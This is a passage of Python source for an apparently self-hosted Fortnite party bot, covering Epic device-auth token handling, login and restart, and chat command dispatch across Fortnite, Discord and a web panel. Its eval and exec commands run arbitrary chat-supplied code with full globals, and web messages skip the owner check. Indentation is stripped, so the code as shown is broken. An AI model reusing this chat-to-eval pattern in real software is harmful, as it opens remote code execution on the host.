if item not in cache_items[lang]:
cache_items[lang].append(item)
return variants
def get_banner_data() -> dict:
res = requests.get("https://benbotfn.tk/api/v1/exportAsset?path=FortniteGame/Content/Banners/BannerIcons")
if res.status_code == 200:
return res.json()
return None
def store_banner_data() -> None:
data = get_banner_data()
with open("items/banners.json","w",encoding="utf-8") as f:
json.dump(data,f,indent=4,ensure_ascii=False)
def search_banner(id_: str) -> Optional[dict]:
data_ = load_json("items/banners.json")
data_ = {k.lower():v for k,v in data_.items()}
return data_.get(id_.lower())
def restart(sleep_time: Optional[Union[int,float]] = 0) -> None:
if sleep_time > 0:
time.sleep(sleep_time)
os.chdir(os.getcwd())
os.execv(os.sys.executable,['python', *sys.argv])
if True: #Asynchronous functions
async def reply(message: Union[fortnitepy.message.MessageBase, discord.Message, WebMessage], client: fortnitepy.Client, content: str) -> None:
if isinstance(message, fortnitepy.message.MessageBase):
await message.reply(content)
elif isinstance(message, discord.Message):
if len(content) > 1990:
text = discord.utils.escape_markdown(content).split("\n")
for txt in text:
if len(txt) > 1990:
text = [txt[i:i+1990] for i in range(0, len(txt), 1990)]
for t in text:
await message.channel.send(t)
else:
await message.channel.send(content)
else:
await message.channel.send(content)
elif isinstance(message, WebMessage):
message.reply(content)
elif isinstance(message, AllMessage):
message.reply(content, client)
async def aexec(code: str, variable: dict) -> Any:
def _(text) -> str:
return re.match(r"(\u0020|\u3000)*", text).end() * u"\u0020"
scode = code.split('\n')
delete = len(_(scode[0]))
lines = [i.replace(u"\u0020", "", delete) for i in scode]
exc = (
f'async def __ex(var):'
+ '\n for v in var:'
+ '\n v = var[v]'
+ ''.join(f'\n {l}' for l in lines)
+ '\n for v in locals():'
+ '\n var[v] = locals()[v]'
)
if data['loglevel'] == 'debug':
send(l('bot'),exc,yellow,add_d=lambda x:f'```\n{x}\n```')
exec(exc)
variable_before = variable.copy()
result = await locals()['__ex'](variable)
variable_after = variable.copy()
newvar = {k: v for k,v in variable_after.items() if (k not in variable_before.keys() or v != variable_before.get(k)) and "_" not in k and k not in ("k", "v") and isinstance(k, str)}
for k in newvar:
exc = (
f"global {k}"
+ f"\n{k} = newvar['{k}']"
)
exec(exc)
return result
async def generate_device_auth_and_store(email: str) -> str:
global web_text
while True:
send(l('bot'),l('get_code', email))
web_text = l('get_code2', email)
response = await ainput("Data: \n")
if "redirectUrl" in response:
response = json.loads(response)
if "?code" not in response["redirectUrl"]:
send(l('bot'),l('unauthorized'))
continue
code = response["redirectUrl"].split("?code=")[1]
else:
if "https://accounts.epicgames.com/fnauth" in response:
if "?code" not in response:
send(l('bot'),l('unauthorized'))
continue
code = response.split("?code=")[1]
else:
code = response
data = await authorization_code_auth(code)
try:
access_token = data["access_token"]
in_app_id = data["in_app_id"]
except KeyError:
send(l('bot'),l('authorization_expired'))
continue
fortnite_access_token, fortnite_expires_at = await get_fortnite_token(access_token)
user = await lookup_user(in_app_id, fortnite_access_token)
if user["email"].lower() == email.lower():
break
else:
send(l('bot'),l('account_incorrect', user["email"], email))
continue
exchange_code = await exchange(access_token)
launcher_access_token, client_id = await exchange_code_auth(exchange_code)
details = await generate_device_auth(client_id, launcher_access_token)
store_device_auth_details(email.lower(), details)
web_text = ""
return details
async def get_token() -> tuple:
async with aiohttp.ClientSession() as session:
data = await session.post(
oauth_url,
headers={
"Authorization": f"basic {launcher_token}"
},
data={
"grant_type": "client_credentials",
"token_type": "eg1"
}
)
data = await data.json()
return data["access_token"], datetime.datetime.fromisoformat(data["expires_at"].replace("Z",""))
async def get_fortnite_token(access_token: str) -> tuple:
exchange_code = await exchange(access_token)
async with aiohttp.ClientSession() as session:
data = await session.post(
fortnite_token_url,
headers={
"Authorization": f"basic {fortnite_token}"
},
data={
"grant_type": "exchange_code",
"token_type": "eg1",
"exchange_code": exchange_code
}
)
data = await data.json()
return data["access_token"], datetime.datetime.fromisoformat(data["expires_at"].replace("Z",""))
async def authorization_code_auth(authorization_code: str) -> Optional[tuple]:
async with aiohttp.ClientSession() as session:
data = await session.post(
oauth_url,
headers={
"Authorization": f"basic {launcher_token}"
},
data={
"grant_type": "authorization_code",
"code": authorization_code,
"token_type": "eg1"
}
)
return await data.json()
async def exchange_code_auth(exchange_code: str) -> tuple:
async with aiohttp.ClientSession() as session:
data = await session.post(
exchange_auth_url,
headers={
"Authorization": f"basic {launcher_token}"
},
data={
"grant_type": "exchange_code",
"exchange_code": exchange_code,
"token_type": "eg1"
}
)
data = await data.json()
return data["access_token"], data["account_id"]
async def exchange(access_token: str) -> str:
async with aiohttp.ClientSession() as session:
data = await session.get(
exchange_url,
headers={
"Authorization": f"bearer {access_token}"
}
)
data = await data.json()
return data["code"]
async def lookup_user(user_id: str, fortnite_access_token: str) -> dict:
async with aiohttp.ClientSession() as session:
data = await session.get(
user_lookup_url.format(user_id=user_id),
headers={
"Authorization": f"bearer {fortnite_access_token}"
}
)
data = await data.json()
return data
async def generate_device_auth(client_id: str, access_token: str) -> dict:
async with aiohttp.ClientSession() as session:
data = await session.post(
f"https://account-public-service-prod.ol.epicgames.com/account/api/public/account/{client_id}/deviceAuth",
headers={
"Authorization": f"Bearer {access_token}",
"Content-Type": "application/json"
}
)
data = await data.json()
return {"device_id": data["deviceId"], "account_id": data["accountId"], "secret": data["secret"]}
async def run_bot() -> None:
for client in clients:
client.booting = True
if data.get('restart_in') not in [None, 0]:
Timer(data.get('restart_in'), restart).start()
try:
await fortnitepy.start_multiple(
clients,
all_ready_callback=lambda: send(l("bot"),l("all_login"),green,add_p=lambda x:f'[{now()}] {x}') if len(clients) > 1 else print('')
)
except fortnitepy.AuthException as e:
if data["loglevel"] == "debug":
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if "errors.com.epicgames.account.oauth.exchange_code_not_found" in e.args[0]:
send(l("bot"),l("exchange_code_error"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
elif "Invalid device auth details passed." in e.args[0]:
some_detail = e.args[0].split("-")[0].strip()
device_auth_details = get_device_auth_details()
for email,details in device_auth_details.items():
for detail in details.values():
if detail == some_detail:
break
else:
continue
break
else:
email = some_detail
device_auth_details.pop(email.lower())
with open(filename, 'w') as f:
json.dump(device_auth_details, f)
restart()
else:
send(l("bot"),l("login_failed"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
sys.exit(1)
except fortnitepy.HTTPException as e:
if data["loglevel"] == "debug":
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if "reset" in e.args[0]:
send(l("bot"),l("password_reset_error"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
else:
send(l("bot"),l("login_failed"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
sys.exit(1)
except KeyboardInterrupt:
sys.exit(1)
except Exception:
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l("bot"),l("failed_to_load_account"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
sys.exit(1)
async def run_app() -> None:
try:
await app.create_server(host=data['web']['ip'], port=data['web']['port'], return_asyncio_server=True, access_log=data['web']['log'])
except OSError:
if data["loglevel"] == "debug":
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l("bot"),l("web_already_running"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
if data["status"] == 0 or bot_ready is False:
webbrowser.open(f"http://{data['web']['ip']}:{data['web']['port']}")
send(l("bot"),l("web_running",f"http://{data['web']['ip']}:{data['web']['port']}"),add_p=lambda x:f'[{now()}] {x}')
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
async def process_command(message: Union[fortnitepy.FriendMessage, fortnitepy.PartyMessage, discord.Message, WebMessage, AllMessage]):
global blacklist
global whitelist
global blacklist_
global whitelist_
global otherbotlist
if not message or not message.content:
return
loop = asyncio.get_event_loop()
content = message.content
con = content.split("\n")
if data['caseinsensitive']:
args = jaconv.kata2hira(content.lower()).split()
else:
args = content.split()
content_ = ' '.join(args[1:])
content2_ = ' '.join(args[2:])
rawargs = content.split()
rawcontent = ' '.join(rawargs[1:])
rawcontent2 = ' '.join(rawargs[2:])
check_ownercommand = True
check_ng = True
if len(args) < 1:
return
if isinstance(message, fortnitepy.message.MessageBase):
client = message.client
client.add_cache(message.author)
if ((data['discord']['enabled'] and not dclient.isready)
or (message.author.id in blacklist and data['fortnite']['blacklist-ignorecommand'])
or (message.author.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['ignorebot'])):
return
if ((len(con) > 1)
and not (args[0] in commands['eval'])
and not (args[0] in commands['exec'])):
tasks = []
for c in con:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
tasks.append([task,mes])
await asyncio.gather(*[task[0] for task in tasks])
for mes in [task[1] for task in tasks]:
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
if isinstance(message, fortnitepy.FriendMessage):
if not client.whisper:
if client.whisperperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist:
return
if data['loglevel'] == 'normal':
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
else:
send(f'{name(message.author)} [{platform_to_str(message.author.platform)}]',content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} [{platform_to_str(message.author.platform)}] | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
elif isinstance(message, fortnitepy.PartyMessage):
if not client.partychat:
if client.partychatperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist:
return
display_name_ = client.is_most()
if display_name_:
if data['loglevel'] == 'normal':
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {name(message.author)} | {x}',add_d=lambda x:f'[{l("party")}] [{display_name_}] {x}')
else:
send(f'{name(message.author)} [{platform_to_str(message.author.platform)}/{message.author.input}]',content,add_p=lambda x:f'[{now()}] [{l("party")}/{client.party.id}] [{display_name_}] {name(message.author)} [{platform_to_str(message.author.platform)}/{message.author.input}] | {x}',add_d=lambda x:f'[{l("party")}/{client.party.id}] [{display_name_}] {x}')
if content_ in commands['me']:
rawcontent = message.author.id
content_ = message.author.id
if ((message.author.id in [owner.id for owner in client.owner])
or (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])):
check_ownercommand = False
if ((message.author.id in [owner.id for owner in client.owner])
or (message.author.id in whitelist and data['fortnite']['whitelist-ignoreng'])):
check_ng = False
elif isinstance(message, discord.Message):
if ((not isinstance(message.channel, discord.TextChannel))
or (message.author.id == dclient.user.id)
or (message.author.id in blacklist_ and data['discord']['blacklist-ignorecommand'])
or (message.author.bot and data['discord']['ignorebot'])):
return
if True in [True for i in data['discord']['channels'] if "{name}" not in i and "{id}" not in i and message.channel.name == i]:
tasks = {}
for client_ in loadedclients:
mes = AllMessage(content, message.author, client_, message)
task = loop.create_task(process_command(mes))
tasks[client_] = [task, mes]
await asyncio.gather(*[i[0] for i in tasks.values()])
for client_,list_ in tasks.items():
result = list_[1].result.get(client_.user.id)
if result:
results = '\n'.join(result)
await reply(message, client_, f"[{name(client_.user)}] {results}")
return
else:
for clientname, client in client_name.items():
if not client.isready:
continue
if message.channel.name in [i.format(name=clientname, id=client.user.id).replace(" ","-").replace(".","-").replace(",","-").replace("--","-").lower() for i in data["discord"]["channels"]]:
break
else:
return
if not client.discord:
if client.discordperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist_:
return
if (len(con) > 1
and not (args[0] in commands['eval'])
and not (args[0] in commands['exec'])):
tasks = []
for c in con:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
tasks.append([task,mes])
await asyncio.gather(*[task[0] for task in tasks])
for mes in [task[1] for task in tasks]:
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}({dclient.user})] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}({dclient.user})] {x}')
if ((message.author.id in [owner.id for owner in dclient.owner])
or (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
check_ownercommand = False
if ((message.author.id in [owner.id for owner in dclient.owner])
or (message.author.id in whitelist_ and data['discord']['whitelist-ignoreng'])):
check_ng = False
elif isinstance(message, WebMessage):
client = message.client
if ((data['discord']['enabled'] and not dclient.isready)
or (not client.web)):
return
if (len(con) > 1
and not (args[0] in commands['eval'])
and not (args[0] in commands['exec'])):
tasks = []
for c in con:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
tasks.append([task,mes])
await asyncio.gather(*[task[0] for task in tasks])
for mes in [task[1] for task in tasks]:
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
check_ownercommand = False
check_ng = False
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
elif isinstance(message, AllMessage):
client = message.client
if data['discord']['enabled'] and not dclient.isready:
return
if (len(con) > 1
and not (args[0] in commands['eval'])
and not (args[0] in commands['exec'])):
tasks = []
for c in con:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
tasks.append([task,mes])
await asyncio.gather(*[task[0] for task in tasks])
for mes in [task[1] for task in tasks]:
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
base = message.base
while isinstance(base, AllMessage):
base = base.base
if isinstance(base, fortnitepy.message.MessageBase):
client.add_cache(message.author)
if ((message.author.id in blacklist and data['fortnite']['blacklist-ignorecommand'])
or (message.author.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['ignorebot'])):
return
if isinstance(base, fortnitepy.FriendMessage):
if not client.whisper:
if client.whisperperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist:
return
if data['loglevel'] == 'normal':
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
else:
send(f'{name(message.author)} [{platform_to_str(message.author.platform)}]',content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
elif isinstance(base, fortnitepy.PartyMessage):
if not client.partychat:
if client.partychatperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist:
return
display_name = client.is_most()
if display_name:
if data['loglevel'] == 'normal':
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{l("party")}] [{display_name}] {x}')
else:
send(f'{name(message.author)} [{platform_to_str(message.author.platform)}/{message.author.input}]',content,add_p=lambda x:f'[{now()}] [{l("party")}/{client.party.id}] [{display_name}] {name(message.author)} [{platform_to_str(message.author.platform)}/{message.author.input}] | {x}',add_d=lambda x:f'[{l("party")}/{client.party.id}] [{display_name}] {x}')
if rawcontent in commands['me']:
rawcontent = message.author.id
content_ = message.author.id
if ((message.author.id in [owner.id for owner in client.owner])
or (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])):
check_ownercommand = False
if ((message.author.id in [owner.id for owner in client.owner])
or (message.author.id in whitelist and data['fortnite']['whitelist-ignoreng'])):
check_ng = False
elif isinstance(base, discord.message.Message):
if ((message.author.id == dclient.user.id)
or (message.author.id in blacklist_ and data['discord']['blacklist-ignorecommand'])
or (message.author.bot and data['discord']['ignorebot'])):
return
if not client.discord:
if client.discordperfect:
return
elif message.author.id not in [owner.id for owner in dclient.owner] and message.author.id not in whitelist_:
return
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}({dclient.user})] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}({dclient.user})] {x}')
if ((message.author.id in [owner.id for owner in dclient.owner])
or (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
check_ownercommand = False
if ((message.author.id in [owner.id for owner in dclient.owner])
or (message.author.id in whitelist_ and data['discord']['whitelist-ignoreng'])):
check_ng = False
elif isinstance(base, WebMessage):
if ((data['discord']['enabled'] and not dclient.isready)
or (not client.web)):
return
check_ownercommand = False
check_ng = False
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
if not client.isready:
return
display_name = name(client.user)
do_itemsearch = True
if check_ownercommand:
for command in commands['ownercommands']:
if command in ("cid_", "bid_", "petcarrier_", "pickaxe_id_", "eid_", "emoji_", "toy_"):
if args[0].startswith(command):
await reply(message, client, l("this_command_owneronly"))
return
elif command == "item-search":
do_itemsearch = False
elif args[0] in commands[command]:
await reply(message, client, l("this_command_owneronly"))
return
reply_flag = False
for key,value in replies.items():
reply_flag_ = False
if data["replies-matchmethod"] == "contains":
if [k for k in key.split(',') if k in content]:
reply_flag_ = True
elif data["replies-matchmethod"] == "full":
if [k for k in key.split(',') if k == content]:
reply_flag_ = True
elif data["replies-matchmethod"] == "starts":
if [k for k in key.split(',') if content.startswith(k)]:
reply_flag_ = True
elif data["replies-matchmethod"] == "ends":
if [k for k in key.split(',') if content.endswith(k)]:
reply_flag_ = True
if reply_flag_:
reply_flag = True
var = defaultdict(lambda: None)
var.update(client.get_client_data())
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients]),
"author_display_name": message.author.display_name,
"author_id": message.author.id
}
)
mes = eval_format(value,var)
await reply(message, client, mes)
if check_ng:
flag = False
if data["ng-word-matchmethod"] == "contains":
if [ng for ng in data["ng-words"] if ng in content]:
flag = True
elif data["ng-word-matchmethod"] == "full":
if [ng for ng in data["ng-words"] if ng == content]:
flag = True
elif data["ng-word-matchmethod"] == "starts":
if [ng for ng in data["ng-words"] if content.startswith(ng)]:
flag = True
elif data["ng-word-matchmethod"] == "ends":
if [ng for ng in data["ng-words"] if content.endswith(ng)]:
flag = True
if flag:
if data["ng-word-blacklist"]:
if isinstance(message, fortnitepy.message.MessageBase):
blacklist.append(message.author.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"].append(message.author.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
elif isinstance(message, discord.Message):
blacklist_.append(message.author.id)
data_ = load_json("config.json")
data_["discord"]["blacklist"].append(message.author.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
member = client.party.get_member(message.author.id)
if member and client.party.me.leader:
if data["ng-word-kick"]:
try:
await member.kick()
except Exception as e:
if data["loglevel"] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"{l('error')}\n{traceback.format_exc()}")
elif data["ng-word-chatban"]:
try:
await member.chatban()
except Exception as e:
if data["loglevel"] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"{l('error')}\n{traceback.format_exc()}")
return
if reply_flag:
return
if args[0] in commands['prev']:
c = client.prevmessage.get(message.author.id)
if c:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
await task
result = mes.result
if result:
await reply(message, client, '\n'.join(result))
return
client.prevmessage[message.author.id] = content
if args[0] in commands['eval']:
try:
if rawcontent == "":
await reply(message, client, f"[{commands['eval']}] [{l('eval')}]")
return
variable = globals()
variable.update(locals())
if rawcontent.startswith("await "):
if data['loglevel'] == "debug":
send(display_name,f"await eval({rawcontent.replace('await ','',1)})",yellow,add_d=lambda x:f'```\n{x}\n```')
result = await eval(rawcontent.replace("await ","",1), variable)
send(display_name,str(result))
await reply(message, client, str(result))
else:
if data['loglevel'] == "debug":
send(display_name,f"eval {rawcontent}",yellow,add_d=lambda x:f'```\n{x}\n```')
result = eval(rawcontent, variable)
send(display_name,str(result))
await reply(message, client, str(result))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"{l('error')}\n{traceback.format_exc()}")
elif args[0] in commands['exec']:
try:
if rawcontent == "":
await reply(message, client, f"[{commands['exec']}] [{l('exec')}]")
return
variable = globals()
variable.update(locals())
result = await aexec(content.replace(f"{args[0]} ","",1), variable)
await reply(message, client, str(result))
except Exception as e:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"{l('error')}\n{traceback.format_exc()}")
if data['discord']['enabled']:
if args[0] in commands['addblacklist_discord']:
try:
if rawcontent == '' or not args[1].isdigit():
await reply(message, client, f"[{commands['addblacklist_discord']}] [{l('userid')}]")
return
user = dclient.get_user(int(args[1]))
if not user:
user = await dclient.fetch_user(int(args[1]))
if user.id not in blacklist_:
blacklist_.append(user.id)
data_ = load_json("config.json")
data_["discord"]["blacklist"].append(user.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('add_to_list', f'{name(user)}', l('discord_blacklist')),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('add_to_list', f'{name(user)}', l('discord_blacklist')))
else:
await reply(message, client, l('already_list', f'{name(user)}', l('discord_blacklist')))
except discord.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removeblacklist_discord']:
try:
if rawcontent == '' or not args[1].isdigit():
await reply(message, client, f"[{commands['removeblacklist_discord']}] [{l('userid')}]")
return
user = dclient.get_user(int(args[1]))
if not user:
user = await dclient.fetch_user(int(args[1]))
if user.id in blacklist_:
blacklist_.remove(user.id)
data_ = load_json("config.json")
data_["discord"]["blacklist"].remove(user.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', f'{name(user)}', l('discord_blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('remove_from_list', f'{name(user)}', l('discord_blacklist')))
else:
await reply(message, client, l('not_list', f'{name(user)}', l('discord_blacklist')))
except discord.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l('user_notfound'),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,traceback.format_exc(),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addwhitelist_discord']:
try:
if rawcontent == '' or not args[1].isdigit():
await reply(message, client, f"[{commands['addwhitelist_discord']}] [{l('userid')}]")
return
user = dclient.get_user(int(args[1]))
if not user:
user = await dclient.fetch_user(int(args[1]))
if user.id not in whitelist_:
whitelist_.append(user.id)
data_ = load_json("config.json")
data_["discord"]["whitelist"].append(user.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', f'{name(user)}', l('discord_whitelist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('add_from_list', f'{name(user)}', l('discord_whitelist')))
else:
await reply(message, client, l('already_list', f'{name(user)}', l('discord_whitelist')))
except discord.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removewhitelist_discord']:
try:
if rawcontent == '' or not args[1].isdigit():
await reply(message, client, f"[{commands['removewhitelist_discord']}] [{l('userid')}]")
return
user = dclient.get_user(int(args[1]))
if not user:
user = await dclient.fetch_user(int(args[1]))
if user.id in whitelist_:
whitelist_.remove(user.id)
data_ = load_json("config.json")
data_["discord"]["whitelist"].remove(user.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', f'{name(user)}', l('discord_whitelist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('remove_list', f'{name(user)}', l('discord_whitelist')))
else:
await reply(message, client, l('not_list', f'{name(user)}', l('discord_whitelist')))
except discord.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
if args[0] in commands['restart']:
try:
if not client.acceptinvite:
if isinstance(message, fortnitepy.message.MessageBase) or isinstance(getattr(message,"base",None), fortnitepy.message.MessageBase):
if (not (message.author.id in [owner.id for owner in client.owner])
and not (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])
and not (message.author.id in [owner.id for owner in dclient.owner])
and not (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
await reply(message, client, l('invite_is_decline'))
return
await reply(message, client, l('restarting'))
Thread(target=restart,args=(0.5,)).start()
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['relogin']:
try:
if client.acceptinvite is False:
if isinstance(message, fortnitepy.message.MessageBase) or isinstance(getattr(message,"base",None), fortnitepy.message.MessageBase):
if (not (message.author.id in [owner.id for owner in client.owner])
and not (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])
and not (message.author.id in [owner.id for owner in dclient.owner])
and not (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
await reply(message, client, l('invite_is_decline'))
return
await reply(message, client, l('relogining'))
await client.restart()
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['reload']:
success = load_config(client)
try:
if success:
await reply(message, client, l('success'))
else:
await reply(message, client, l('error'))
return
try:
if data['fortnite']['avatar_id'] == "{bot}":
client.set_avatar(fortnitepy.Avatar(asset=client.party.me.outfit, background_colors=data['fortnite']['avatar_color']))
else:
client.set_avatar(fortnitepy.Avatar(asset=data['fortnite']['avatar_id'].format(bot=client.party.me.outfit), background_colors=data['fortnite']['avatar_color']))
except Exception:
if data['loglevel'] == 'debug':
send(name(client.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
client.owner = []
for owner in data['fortnite']['owner']:
user = client.get_user(owner) or client.get_cache_user(owner)
if not user:
try:
user = await client.fetch_user(owner)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l("owner_notfound",owner),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.add_cache(user)
friend = client.get_friend(user.id)
if not friend:
send(display_name,l("not_friend_with_owner",commands["reload"]),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend'] and not client.is_pending(user.id):
try:
await client.add_friend(user.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_sending_friendrequest"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
client.owner.append(friend)
